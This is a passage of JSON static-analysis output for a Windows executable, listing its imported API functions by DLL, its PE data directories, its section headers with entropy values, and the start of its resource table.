                "name": "GetLastError"
              },
              {
                "address": "0x1400e0570",
                "name": "CreateMutexW"
              },
              {
                "address": "0x1400e0578",
                "name": "CloseHandle"
              },
              {
                "address": "0x1400e0580",
                "name": "GetExitCodeThread"
              },
              {
                "address": "0x1400e0588",
                "name": "SetThreadPriority"
              },
              {
                "address": "0x1400e0590",
                "name": "CreateThread"
              },
              {
                "address": "0x1400e0598",
                "name": "GetStringTypeExW"
              },
              {
                "address": "0x1400e05a0",
                "name": "lstrcmpiW"
              },
              {
                "address": "0x1400e05a8",
                "name": "GetCurrentThreadId"
              },
              {
                "address": "0x1400e05b0",
                "name": "GlobalUnlock"
              },
              {
                "address": "0x1400e05b8",
                "name": "GlobalFree"
              },
              {
                "address": "0x1400e05c0",
                "name": "GlobalAlloc"
              },
              {
                "address": "0x1400e05c8",
                "name": "GlobalLock"
              },
              {
                "address": "0x1400e05d0",
                "name": "SetErrorMode"
              },
              {
                "address": "0x1400e05d8",
                "name": "SetCurrentDirectoryW"
              },
              {
                "address": "0x1400e05e0",
                "name": "Sleep"
              },
              {
                "address": "0x1400e05e8",
                "name": "GetTickCount"
              },
              {
                "address": "0x1400e05f0",
                "name": "MulDiv"
              },
              {
                "address": "0x1400e05f8",
                "name": "RtlCaptureContext"
              },
              {
                "address": "0x1400e0600",
                "name": "HeapSetInformation"
              },
              {
                "address": "0x1400e0608",
                "name": "GetVersion"
              },
              {
                "address": "0x1400e0610",
                "name": "HeapCreate"
              },
              {
                "address": "0x1400e0618",
                "name": "InitializeCriticalSectionAndSpinCount"
              },
              {
                "address": "0x1400e0620",
                "name": "HeapSize"
              },
              {
                "address": "0x1400e0628",
                "name": "HeapQueryInformation"
              },
              {
                "address": "0x1400e0630",
                "name": "GetCommandLineW"
              },
              {
                "address": "0x1400e0638",
                "name": "GetStartupInfoW"
              },
              {
                "address": "0x1400e0640",
                "name": "RtlUnwindEx"
              },
              {
                "address": "0x1400e0648",
                "name": "GetStringTypeW"
              },
              {
                "address": "0x1400e0650",
                "name": "RaiseException"
              },
              {
                "address": "0x1400e0658",
                "name": "RtlPcToFileHeader"
              },
              {
                "address": "0x1400e0660",
                "name": "LCMapStringW"
              },
              {
                "address": "0x1400e0668",
                "name": "GetConsoleCP"
              },
              {
                "address": "0x1400e0670",
                "name": "GetConsoleMode"
              },
              {
                "address": "0x1400e0678",
                "name": "FreeEnvironmentStringsW"
              },
              {
                "address": "0x1400e0680",
                "name": "GetEnvironmentStringsW"
              },
              {
                "address": "0x1400e0688",
                "name": "SetHandleCount"
              },
              {
                "address": "0x1400e0690",
                "name": "QueryPerformanceCounter"
              },
              {
                "address": "0x1400e0698",
                "name": "GetOEMCP"
              },
              {
                "address": "0x1400e06a0",
                "name": "SetFilePointer"
              },
              {
                "address": "0x1400e06a8",
                "name": "WriteConsoleW"
              },
              {
                "address": "0x1400e06b0",
                "name": "SetStdHandle"
              },
              {
                "address": "0x1400e06b8",
                "name": "FlushFileBuffers"
              },
              {
                "address": "0x1400e06c0",
                "name": "GetFileSizeEx"
              },
              {
                "address": "0x1400e06c8",
                "name": "GetProcessHeap"
              }
            ]
          },
          "USER32": {
            "dll": "USER32.dll",
            "imports": [
              {
                "address": "0x1400e0810",
                "name": "GetDlgItem"
              },
              {
                "address": "0x1400e0818",
                "name": "SetDlgItemTextW"
              },
              {
                "address": "0x1400e0820",
                "name": "MessageBeep"
              },
              {
                "address": "0x1400e0828",
                "name": "GetCursorInfo"
              },
              {
                "address": "0x1400e0830",
                "name": "GetLastInputInfo"
              },
              {
                "address": "0x1400e0838",
                "name": "GetSystemMenu"
              },
              {
                "address": "0x1400e0840",
                "name": "GetMenuItemCount"
              },
              {
                "address": "0x1400e0848",
                "name": "GetMenuItemID"
              },
              {
                "address": "0x1400e0850",
                "name": "GetSubMenu"
              },
              {
                "address": "0x1400e0858",
                "name": "GetMenuStringW"
              },
              {
                "address": "0x1400e0860",
                "name": "ExitWindowsEx"
              },
              {
                "address": "0x1400e0868",
                "name": "SetMenu"
              },
              {
                "address": "0x1400e0870",
                "name": "FlashWindow"
              },
              {
                "address": "0x1400e0878",
                "name": "GetPropW"
              },
              {
                "address": "0x1400e0880",
                "name": "SetPropW"
              },
              {
                "address": "0x1400e0888",
                "name": "RemovePropW"
              },
              {
                "address": "0x1400e0890",
                "name": "MapWindowPoints"
              },
              {
                "address": "0x1400e0898",
                "name": "RedrawWindow"
              },
              {
                "address": "0x1400e08a0",
                "name": "SetWindowLongPtrW"
              },
              {
                "address": "0x1400e08a8",
                "name": "SetParent"
              },
              {
                "address": "0x1400e08b0",
                "name": "GetClassInfoExW"
              },
              {
                "address": "0x1400e08b8",
                "name": "DefDlgProcW"
              },
              {
                "address": "0x1400e08c0",
                "name": "GetAncestor"
              },
              {
                "address": "0x1400e08c8",
                "name": "UpdateWindow"
              },
              {
                "address": "0x1400e08d0",
                "name": "GetMessagePos"
              },
              {
                "address": "0x1400e08d8",
                "name": "GetClassLongPtrW"
              },
              {
                "address": "0x1400e08e0",
                "name": "CallWindowProcW"
              },
              {
                "address": "0x1400e08e8",
                "name": "CheckRadioButton"
              },
              {
                "address": "0x1400e08f0",
                "name": "IntersectRect"
              },
              {
                "address": "0x1400e08f8",
                "name": "GetUpdateRect"
              },
              {
                "address": "0x1400e0900",
                "name": "PtInRect"
              },
              {
                "address": "0x1400e0908",
                "name": "CreateDialogIndirectParamW"
              },
              {
                "address": "0x1400e0910",
                "name": "GetWindowLongPtrW"
              },
              {
                "address": "0x1400e0918",
                "name": "CreateAcceleratorTableW"
              },
              {
                "address": "0x1400e0920",
                "name": "DestroyAcceleratorTable"
              },
              {
                "address": "0x1400e0928",
                "name": "InsertMenuItemW"
              },
              {
                "address": "0x1400e0930",
                "name": "SetMenuDefaultItem"
              },
              {
                "address": "0x1400e0938",
                "name": "RemoveMenu"
              },
              {
                "address": "0x1400e0940",
                "name": "SetMenuItemInfoW"
              },
              {
                "address": "0x1400e0948",
                "name": "IsMenu"
              },
              {
                "address": "0x1400e0950",
                "name": "GetMenuItemInfoW"
              },
              {
                "address": "0x1400e0958",
                "name": "CreateMenu"
              },
              {
                "address": "0x1400e0960",
                "name": "CreatePopupMenu"
              },
              {
                "address": "0x1400e0968",
                "name": "SetMenuInfo"
              },
              {
                "address": "0x1400e0970",
                "name": "AppendMenuW"
              },
              {
                "address": "0x1400e0978",
                "name": "DestroyMenu"
              },
              {
                "address": "0x1400e0980",
                "name": "TrackPopupMenuEx"
              },
              {
                "address": "0x1400e0988",
                "name": "CopyImage"
              },
              {
                "address": "0x1400e0990",
                "name": "CreateIconIndirect"
              },
              {
                "address": "0x1400e0998",
                "name": "CreateIconFromResourceEx"
              },
              {
                "address": "0x1400e09a0",
                "name": "EnumClipboardFormats"
              },
              {
                "address": "0x1400e09a8",
                "name": "GetWindow"
              },
              {
                "address": "0x1400e09b0",
                "name": "BringWindowToTop"
              },
              {
                "address": "0x1400e09b8",
                "name": "MessageBoxW"
              },
              {
                "address": "0x1400e09c0",
                "name": "GetTopWindow"
              },
              {
                "address": "0x1400e09c8",
                "name": "GetQueueStatus"
              },
              {
                "address": "0x1400e09d0",
                "name": "SendDlgItemMessageW"
              },
              {
                "address": "0x1400e09d8",
                "name": "SetClipboardViewer"
              },
              {
                "address": "0x1400e09e0",
                "name": "LoadAcceleratorsW"
              },
              {
                "address": "0x1400e09e8",
                "name": "EnableMenuItem"
              },
              {
                "address": "0x1400e09f0",
                "name": "GetMenu"
              },
              {
                "address": "0x1400e09f8",
                "name": "CreateWindowExW"
              },
              {
                "address": "0x1400e0a00",
                "name": "RegisterClassExW"
              },
              {
                "address": "0x1400e0a08",
                "name": "LoadCursorW"
              },
              {
                "address": "0x1400e0a10",
                "name": "DestroyWindow"
              },
              {
                "address": "0x1400e0a18",
                "name": "EnableWindow"
              },
              {
                "address": "0x1400e0a20",
                "name": "MapVirtualKeyW"
              },
              {
                "address": "0x1400e0a28",
                "name": "VkKeyScanExW"
              },
              {
                "address": "0x1400e0a30",
                "name": "MapVirtualKeyExW"
              },
              {
                "address": "0x1400e0a38",
                "name": "GetKeyboardLayoutNameW"
              },
              {
                "address": "0x1400e0a40",
                "name": "ActivateKeyboardLayout"
              },
              {
                "address": "0x1400e0a48",
                "name": "GetGUIThreadInfo"
              },
              {
                "address": "0x1400e0a50",
                "name": "GetWindowTextW"
              },
              {
                "address": "0x1400e0a58",
                "name": "mouse_event"
              },
              {
                "address": "0x1400e0a60",
                "name": "WindowFromPoint"
              },
              {
                "address": "0x1400e0a68",
                "name": "GetSystemMetrics"
              },
              {
                "address": "0x1400e0a70",
                "name": "keybd_event"
              },
              {
                "address": "0x1400e0a78",
                "name": "SetKeyboardState"
              },
              {
                "address": "0x1400e0a80",
                "name": "GetKeyboardState"
              },
              {
                "address": "0x1400e0a88",
                "name": "GetCursorPos"
              },
              {
                "address": "0x1400e0a90",
                "name": "GetAsyncKeyState"
              },
              {
                "address": "0x1400e0a98",
                "name": "AttachThreadInput"
              },
              {
                "address": "0x1400e0aa0",
                "name": "SendInput"
              },
              {
                "address": "0x1400e0aa8",
                "name": "UnregisterHotKey"
              },
              {
                "address": "0x1400e0ab0",
                "name": "RegisterHotKey"
              },
              {
                "address": "0x1400e0ab8",
                "name": "SendMessageTimeoutW"
              },
              {
                "address": "0x1400e0ac0",
                "name": "UnhookWindowsHookEx"
              },
              {
                "address": "0x1400e0ac8",
                "name": "SetWindowsHookExW"
              },
              {
                "address": "0x1400e0ad0",
                "name": "PostThreadMessageW"
              },
              {
                "address": "0x1400e0ad8",
                "name": "IsCharAlphaNumericW"
              },
              {
                "address": "0x1400e0ae0",
                "name": "IsCharUpperW"
              },
              {
                "address": "0x1400e0ae8",
                "name": "IsCharLowerW"
              },
              {
                "address": "0x1400e0af0",
                "name": "ToUnicodeEx"
              },
              {
                "address": "0x1400e0af8",
                "name": "GetKeyboardLayout"
              },
              {
                "address": "0x1400e0b00",
                "name": "CallNextHookEx"
              },
              {
                "address": "0x1400e0b08",
                "name": "CharLowerW"
              },
              {
                "address": "0x1400e0b10",
                "name": "ReleaseDC"
              },
              {
                "address": "0x1400e0b18",
                "name": "GetDC"
              },
              {
                "address": "0x1400e0b20",
                "name": "OpenClipboard"
              },
              {
                "address": "0x1400e0b28",
                "name": "GetClipboardData"
              },
              {
                "address": "0x1400e0b30",
                "name": "GetClipboardFormatNameW"
              },
              {
                "address": "0x1400e0b38",
                "name": "CloseClipboard"
              },
              {
                "address": "0x1400e0b40",
                "name": "SetClipboardData"
              },
              {
                "address": "0x1400e0b48",
                "name": "EmptyClipboard"
              },
              {
                "address": "0x1400e0b50",
                "name": "PostMessageW"
              },
              {
                "address": "0x1400e0b58",
                "name": "FindWindowW"
              },
              {
                "address": "0x1400e0b60",
                "name": "EndDialog"
              },
              {
                "address": "0x1400e0b68",
                "name": "IsWindow"
              },
              {
                "address": "0x1400e0b70",
                "name": "DispatchMessageW"
              },
              {
                "address": "0x1400e0b78",
                "name": "TranslateMessage"
              },
              {
                "address": "0x1400e0b80",
                "name": "ShowWindow"
              },
              {
                "address": "0x1400e0b88",
                "name": "CountClipboardFormats"
              },
              {
                "address": "0x1400e0b90",
                "name": "SetWindowLongW"
              },
              {
                "address": "0x1400e0b98",
                "name": "ScreenToClient"
              },
              {
                "address": "0x1400e0ba0",
                "name": "IsDialogMessageW"
              },
              {
                "address": "0x1400e0ba8",
                "name": "DialogBoxParamW"
              },
              {
                "address": "0x1400e0bb0",
                "name": "SetForegroundWindow"
              },
              {
                "address": "0x1400e0bb8",
                "name": "DefWindowProcW"
              },
              {
                "address": "0x1400e0bc0",
                "name": "FillRect"
              },
              {
                "address": "0x1400e0bc8",
                "name": "DrawIconEx"
              },
              {
                "address": "0x1400e0bd0",
                "name": "GetSysColorBrush"
              },
              {
                "address": "0x1400e0bd8",
                "name": "GetSysColor"
              },
              {
                "address": "0x1400e0be0",
                "name": "RegisterWindowMessageW"
              },
              {
                "address": "0x1400e0be8",
                "name": "EnumDisplayMonitors"
              },
              {
                "address": "0x1400e0bf0",
                "name": "IsIconic"
              },
              {
                "address": "0x1400e0bf8",
                "name": "IsZoomed"
              },
              {
                "address": "0x1400e0c00",
                "name": "EnumWindows"
              },
              {
                "address": "0x1400e0c08",
                "name": "ChangeClipboardChain"
              },
              {
                "address": "0x1400e0c10",
                "name": "GetWindowTextLengthW"
              },
              {
                "address": "0x1400e0c18",
                "name": "SendMessageW"
              },
              {
                "address": "0x1400e0c20",
                "name": "IsWindowEnabled"
              },
              {
                "address": "0x1400e0c28",
                "name": "GetWindowLongW"
              },
              {
                "address": "0x1400e0c30",
                "name": "GetKeyState"
              },
              {
                "address": "0x1400e0c38",
                "name": "TranslateAcceleratorW"
              },
              {
                "address": "0x1400e0c40",
                "name": "KillTimer"
              },
              {
                "address": "0x1400e0c48",
                "name": "PeekMessageW"
              },
              {
                "address": "0x1400e0c50",
                "name": "GetFocus"
              },
              {
                "address": "0x1400e0c58",
                "name": "GetClassNameW"
              },
              {
                "address": "0x1400e0c60",
                "name": "GetWindowThreadProcessId"
              },
              {
                "address": "0x1400e0c68",
                "name": "GetForegroundWindow"
              },
              {
                "address": "0x1400e0c70",
                "name": "InvalidateRect"
              },
              {
                "address": "0x1400e0c78",
                "name": "SetLayeredWindowAttributes"
              },
              {
                "address": "0x1400e0c80",
                "name": "SetWindowPos"
              },
              {
                "address": "0x1400e0c88",
                "name": "SetWindowRgn"
              },
              {
                "address": "0x1400e0c90",
                "name": "SetFocus"
              },
              {
                "address": "0x1400e0c98",
                "name": "SetActiveWindow"
              },
              {
                "address": "0x1400e0ca0",
                "name": "ClientToScreen"
              },
              {
                "address": "0x1400e0ca8",
                "name": "EnumChildWindows"
              },
              {
                "address": "0x1400e0cb0",
                "name": "MoveWindow"
              },
              {
                "address": "0x1400e0cb8",
                "name": "GetWindowRect"
              },
              {
                "address": "0x1400e0cc0",
                "name": "GetMonitorInfoW"
              },
              {
                "address": "0x1400e0cc8",
                "name": "MonitorFromPoint"
              },
              {
                "address": "0x1400e0cd0",
                "name": "GetClientRect"
              },
              {
                "address": "0x1400e0cd8",
                "name": "SystemParametersInfoW"
              },
              {
                "address": "0x1400e0ce0",
                "name": "AdjustWindowRectEx"
              },
              {
                "address": "0x1400e0ce8",
                "name": "DrawTextW"
              },
              {
                "address": "0x1400e0cf0",
                "name": "SetRect"
              },
              {
                "address": "0x1400e0cf8",
                "name": "GetIconInfo"
              },
              {
                "address": "0x1400e0d00",
                "name": "SetWindowTextW"
              },
              {
                "address": "0x1400e0d08",
                "name": "IsWindowVisible"
              },
              {
                "address": "0x1400e0d10",
                "name": "BlockInput"
              },
              {
                "address": "0x1400e0d18",
                "name": "GetMessageW"
              },
              {
                "address": "0x1400e0d20",
                "name": "SetTimer"
              },
              {
                "address": "0x1400e0d28",
                "name": "GetParent"
              },
              {
                "address": "0x1400e0d30",
                "name": "GetDlgCtrlID"
              },
              {
                "address": "0x1400e0d38",
                "name": "CharUpperW"
              },
              {
                "address": "0x1400e0d40",
                "name": "IsClipboardFormatAvailable"
              },
              {
                "address": "0x1400e0d48",
                "name": "CheckMenuItem"
              },
              {
                "address": "0x1400e0d50",
                "name": "PostQuitMessage"
              },
              {
                "address": "0x1400e0d58",
                "name": "IsCharAlphaW"
              },
              {
                "address": "0x1400e0d60",
                "name": "LoadImageW"
              },
              {
                "address": "0x1400e0d68",
                "name": "DestroyIcon"
              }
            ]
          },
          "GDI32": {
            "dll": "GDI32.dll",
            "imports": [
              {
                "address": "0x1400e00f8",
                "name": "GetPixel"
              },
              {
                "address": "0x1400e0100",
                "name": "GetClipRgn"
              },
              {
                "address": "0x1400e0108",
                "name": "GetCharABCWidthsW"
              },
              {
                "address": "0x1400e0110",
                "name": "SetBkMode"
              },
              {
                "address": "0x1400e0118",
                "name": "CreatePatternBrush"
              },
              {
                "address": "0x1400e0120",
                "name": "SetBrushOrgEx"
              },
              {
                "address": "0x1400e0128",
                "name": "EnumFontFamiliesExW"
              },
              {
                "address": "0x1400e0130",
                "name": "CreateDIBSection"
              },
              {
                "address": "0x1400e0138",
                "name": "GdiFlush"
              },
              {
                "address": "0x1400e0140",
                "name": "SetBkColor"
              },
              {
                "address": "0x1400e0148",
                "name": "ExcludeClipRect"
              },
              {
                "address": "0x1400e0150",
                "name": "SetTextColor"
              },
              {
                "address": "0x1400e0158",
                "name": "GetClipBox"
              },
              {
                "address": "0x1400e0160",
                "name": "BitBlt"
              },
              {
                "address": "0x1400e0168",
                "name": "CreateCompatibleBitmap"
              },
              {
                "address": "0x1400e0170",
                "name": "GetSystemPaletteEntries"
              },
              {
                "address": "0x1400e0178",
                "name": "GetDIBits"
              },
              {
                "address": "0x1400e0180",
                "name": "CreateCompatibleDC"
              },
              {
                "address": "0x1400e0188",
                "name": "CreatePolygonRgn"
              },
              {
                "address": "0x1400e0190",
                "name": "CreateRectRgn"
              },
              {
                "address": "0x1400e0198",
                "name": "CreateRoundRectRgn"
              },
              {
                "address": "0x1400e01a0",
                "name": "CreateEllipticRgn"
              },
              {
                "address": "0x1400e01a8",
                "name": "DeleteDC"
              },
              {
                "address": "0x1400e01b0",
                "name": "GetObjectW"
              },
              {
                "address": "0x1400e01b8",
                "name": "GetTextMetricsW"
              },
              {
                "address": "0x1400e01c0",
                "name": "GetTextFaceW"
              },
              {
                "address": "0x1400e01c8",
                "name": "SelectObject"
              },
              {
                "address": "0x1400e01d0",
                "name": "GetStockObject"
              },
              {
                "address": "0x1400e01d8",
                "name": "CreateDCW"
              },
              {
                "address": "0x1400e01e0",
                "name": "CreateSolidBrush"
              },
              {
                "address": "0x1400e01e8",
                "name": "CreateFontW"
              },
              {
                "address": "0x1400e01f0",
                "name": "FillRgn"
              },
              {
                "address": "0x1400e01f8",
                "name": "GetDeviceCaps"
              },
              {
                "address": "0x1400e0200",
                "name": "DeleteObject"
              }
            ]
          },
          "COMDLG32": {
            "dll": "COMDLG32.dll",
            "imports": [
              {
                "address": "0x1400e00d8",
                "name": "CommDlgExtendedError"
              },
              {
                "address": "0x1400e00e0",
                "name": "GetSaveFileNameW"
              },
              {
                "address": "0x1400e00e8",
                "name": "GetOpenFileNameW"
              }
            ]
          },
          "ADVAPI32": {
            "dll": "ADVAPI32.dll",
            "imports": [
              {
                "address": "0x1400e0000",
                "name": "RegDeleteKeyW"
              },
              {
                "address": "0x1400e0008",
                "name": "RegSetValueExW"
              },
              {
                "address": "0x1400e0010",
                "name": "RegCreateKeyExW"
              },
              {
                "address": "0x1400e0018",
                "name": "RegQueryValueExW"
              },
              {
                "address": "0x1400e0020",
                "name": "AdjustTokenPrivileges"
              },
              {
                "address": "0x1400e0028",
                "name": "LookupPrivilegeValueW"
              },
              {
                "address": "0x1400e0030",
                "name": "OpenProcessToken"
              },
              {
                "address": "0x1400e0038",
                "name": "CloseServiceHandle"
              },
              {
                "address": "0x1400e0040",
                "name": "UnlockServiceDatabase"
              },
              {
                "address": "0x1400e0048",
                "name": "LockServiceDatabase"
              },
              {
                "address": "0x1400e0050",
                "name": "OpenSCManagerW"
              },
              {
                "address": "0x1400e0058",
                "name": "GetUserNameW"
              },
              {
                "address": "0x1400e0060",
                "name": "RegEnumKeyExW"
              },
              {
                "address": "0x1400e0068",
                "name": "RegEnumValueW"
              },
              {
                "address": "0x1400e0070",
                "name": "RegQueryInfoKeyW"
              },
              {
                "address": "0x1400e0078",
                "name": "RegOpenKeyExW"
              },
              {
                "address": "0x1400e0080",
                "name": "RegCloseKey"
              },
              {
                "address": "0x1400e0088",
                "name": "RegConnectRegistryW"
              },
              {
                "address": "0x1400e0090",
                "name": "RegDeleteValueW"
              }
            ]
          },
          "SHELL32": {
            "dll": "SHELL32.dll",
            "imports": [
              {
                "address": "0x1400e07a0",
                "name": "DragQueryPoint"
              },
              {
                "address": "0x1400e07a8",
                "name": "SHEmptyRecycleBinW"
              },
              {
                "address": "0x1400e07b0",
                "name": "SHFileOperationW"
              },
              {
                "address": "0x1400e07b8",
                "name": "SHGetPathFromIDListW"
              },
              {
                "address": "0x1400e07c0",
                "name": "SHBrowseForFolderW"
              },
              {
                "address": "0x1400e07c8",
                "name": "SHGetDesktopFolder"
              },
              {
                "address": "0x1400e07d0",
                "name": "SHGetMalloc"
              },
              {
                "address": "0x1400e07d8",
                "name": "SHGetFolderPathW"
              },
              {
                "address": "0x1400e07e0",
                "name": "ShellExecuteExW"
              },
              {
                "address": "0x1400e07e8",
                "name": "Shell_NotifyIconW"
              },
              {
                "address": "0x1400e07f0",
                "name": "DragFinish"
              },
              {
                "address": "0x1400e07f8",
                "name": "DragQueryFileW"
              },
              {
                "address": "0x1400e0800",
                "name": "ExtractIconW"
              }
            ]
          },
          "ole32": {
            "dll": "ole32.dll",
            "imports": [
              {
                "address": "0x1400e0e60",
                "name": "OleInitialize"
              },
              {
                "address": "0x1400e0e68",
                "name": "OleUninitialize"
              },
              {
                "address": "0x1400e0e70",
                "name": "CoCreateInstance"
              },
              {
                "address": "0x1400e0e78",
                "name": "CoInitialize"
              },
              {
                "address": "0x1400e0e80",
                "name": "CoUninitialize"
              },
              {
                "address": "0x1400e0e88",
                "name": "CLSIDFromString"
              },
              {
                "address": "0x1400e0e90",
                "name": "CLSIDFromProgID"
              },
              {
                "address": "0x1400e0e98",
                "name": "CoGetObject"
              },
              {
                "address": "0x1400e0ea0",
                "name": "StringFromGUID2"
              },
              {
                "address": "0x1400e0ea8",
                "name": "CreateStreamOnHGlobal"
              }
            ]
          },
          "OLEAUT32": {
            "dll": "OLEAUT32.dll",
            "imports": [
              {
                "address": "0x1400e06d8",
                "name": "SafeArrayGetLBound"
              },
              {
                "address": "0x1400e06e0",
                "name": "GetActiveObject"
              },
              {
                "address": "0x1400e06e8",
                "name": "SysStringLen"
              },
              {
                "address": "0x1400e06f0",
                "name": "OleLoadPicture"
              },
              {
                "address": "0x1400e06f8",
                "name": "SafeArrayUnaccessData"
              },
              {
                "address": "0x1400e0700",
                "name": "SafeArrayGetElemsize"
              },
              {
                "address": "0x1400e0708",
                "name": "SafeArrayAccessData"
              },
              {
                "address": "0x1400e0710",
                "name": "SafeArrayUnlock"
              },
              {
                "address": "0x1400e0718",
                "name": "SafeArrayPtrOfIndex"
              },
              {
                "address": "0x1400e0720",
                "name": "SafeArrayLock"
              },
              {
                "address": "0x1400e0728",
                "name": "SafeArrayGetDim"
              },
              {
                "address": "0x1400e0730",
                "name": "SafeArrayDestroy"
              },
              {
                "address": "0x1400e0738",
                "name": "SafeArrayGetUBound"
              },
              {
                "address": "0x1400e0740",
                "name": "VariantCopyInd"
              },
              {
                "address": "0x1400e0748",
                "name": "SafeArrayCopy"
              },
              {
                "address": "0x1400e0750",
                "name": "SysAllocString"
              },
              {
                "address": "0x1400e0758",
                "name": "VariantChangeType"
              },
              {
                "address": "0x1400e0760",
                "name": "VariantClear"
              },
              {
                "address": "0x1400e0768",
                "name": "SafeArrayCreate"
              },
              {
                "address": "0x1400e0770",
                "name": "SysFreeString"
              }
            ]
          }
        },
        "exported_dll_name": null,
        "exports": [],
        "dirents": [
          {
            "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
            "virtual_address": "0x00000000",
            "size": "0x00000000"
          },
          {
            "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
            "virtual_address": "0x0010e37c",
            "size": "0x0000012c"
          },
          {
            "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
            "virtual_address": "0x00131000",
            "size": "0x00008918"
          },
          {
            "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
            "virtual_address": "0x0011f000",
            "size": "0x00007a58"
          },
          {
            "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
            "virtual_address": "0x00000000",
            "size": "0x00000000"
          },
          {
            "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
            "virtual_address": "0x00000000",
            "size": "0x00000000"
          },
          {
            "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
            "virtual_address": "0x00000000",
            "size": "0x00000000"
          },
          {
            "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
            "virtual_address": "0x00000000",
            "size": "0x00000000"
          },
          {
            "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
            "virtual_address": "0x00000000",
            "size": "0x00000000"
          },
          {
            "name": "IMAGE_DIRECTORY_ENTRY_TLS",
            "virtual_address": "0x00000000",
            "size": "0x00000000"
          },
          {
            "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
            "virtual_address": "0x00000000",
            "size": "0x00000000"
          },
          {
            "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
            "virtual_address": "0x00000000",
            "size": "0x00000000"
          },
          {
            "name": "IMAGE_DIRECTORY_ENTRY_IAT",
            "virtual_address": "0x000e0000",
            "size": "0x00000eb8"
          },
          {
            "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
            "virtual_address": "0x00000000",
            "size": "0x00000000"
          },
          {
            "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
            "virtual_address": "0x00000000",
            "size": "0x00000000"
          },
          {
            "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
            "virtual_address": "0x00000000",
            "size": "0x00000000"
          }
        ],
        "sections": [
          {
            "name": ".text",
            "raw_address": "0x00000400",
            "virtual_address": "0x00001000",
            "virtual_size": "0x000de3c6",
            "size_of_data": "0x000de400",
            "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
            "characteristics_raw": "0x60000020",
            "entropy": "6.55"
          },
          {
            "name": ".rdata",
            "raw_address": "0x000de800",
            "virtual_address": "0x000e0000",
            "virtual_size": "0x000312de",
            "size_of_data": "0x00031400",
            "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
            "characteristics_raw": "0x40000040",
            "entropy": "4.97"
          },
          {
            "name": ".data",
            "raw_address": "0x0010fc00",
            "virtual_address": "0x00112000",
            "virtual_size": "0x0000c3b8",
            "size_of_data": "0x00005000",
            "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
            "characteristics_raw": "0xc0000040",
            "entropy": "3.31"
          },
          {
            "name": ".pdata",
            "raw_address": "0x00114c00",
            "virtual_address": "0x0011f000",
            "virtual_size": "0x00007a58",
            "size_of_data": "0x00007c00",
            "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
            "characteristics_raw": "0x40000040",
            "entropy": "5.99"
          },
          {
            "name": "text",
            "raw_address": "0x0011c800",
            "virtual_address": "0x00127000",
            "virtual_size": "0x0000258d",
            "size_of_data": "0x00002600",
            "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE",
            "characteristics_raw": "0x20000040",
            "entropy": "5.77"
          },
          {
            "name": "data",
            "raw_address": "0x0011ee00",
            "virtual_address": "0x0012a000",
            "virtual_size": "0x00006ec0",
            "size_of_data": "0x00007000",
            "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
            "characteristics_raw": "0x40000040",
            "entropy": "6.46"
          },
          {
            "name": ".rsrc",
            "raw_address": "0x00125e00",
            "virtual_address": "0x00131000",
            "virtual_size": "0x00008918",
            "size_of_data": "0x00008a00",
            "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
            "characteristics_raw": "0x40000040",
            "entropy": "6.31"
          }
        ],
        "overlay": null,
        "resources": [
          {
            "name": "RT_ICON",
            "offset": "0x00131458",
            "size": "0x000010a8",
            "filetype": null,
            "language": "LANG_ENGLISH",
            "sublanguage": "SUBLANG_ENGLISH_US",
            "entropy": "5.86"
          },
          {
            "name": "RT_ICON",
            "offset": "0x00132500",
            "size": "0x000025a8",
            "filetype": null,
            "language": "LANG_ENGLISH",
            "sublanguage": "SUBLANG_ENGLISH_US",
            "entropy": "5.37"
          },
          {
            "name": "RT_ICON",
            "offset": "0x00134aa8",
            "size": "0x00000468",
            "filetype": null,
            "language": "LANG_ENGLISH",
            "sublanguage": "SUBLANG_ENGLISH_US",
            "entropy": "5.68"
          },
          {
            "name": "RT_ICON",
            "offset": "0x00134f10",
            "size": "0x00000468",
            "filetype": null,
            "language": "LANG_ENGLISH",
            "sublanguage": "SUBLANG_ENGLISH_US",
            "entropy": "5.84"
          },
          {
            "name": "RT_ICON",
            "offset": "0x00135378",
            "size": "0x00000468",
            "filetype": null,
            "language": "LANG_ENGLISH",
            "sublanguage": "SUBLANG_ENGLISH_US",
            "entropy": "5.33"
          },
          {
            "name": "RT_ICON",
            "offset": "0x001357e0",
            "size": "0x00000468",
            "filetype": null,
            "language": "LANG_ENGLISH",
            "sublanguage": "SUBLANG_ENGLISH_US",
            "entropy": "5.47"
          },
          {
            "name": "RT_ICON",
            "offset": "0x00135c48",
            "size": "0x00000128",
            "filetype": null,
            "language": "LANG_ENGLISH",
            "sublanguage": "SUBLANG_ENGLISH_US",
            "entropy": "4.56"
          },
          {
            "name": "RT_MENU",
            "offset": "0x00135d70",
            "size": "0x000002c8",
            "filetype": null,
            "language": "LANG_ENGLISH",
            "sublanguage": "SUBLANG_ENGLISH_US",
            "entropy": "3.37"
          },
          {
            "name": "RT_DIALOG",
            "offset": "0x00136038",
            "size": "0x000000e8",
            "filetype": null,
            "language": "LANG_ENGLISH",
            "sublanguage": "SUBLANG_ENGLISH_US",
            "entropy": "2.82"
          },
          {
            "name": "RT_ACCELERATOR",
            "offset": "0x00136120",
            "size": "0x00000048",
            "filetype": null,
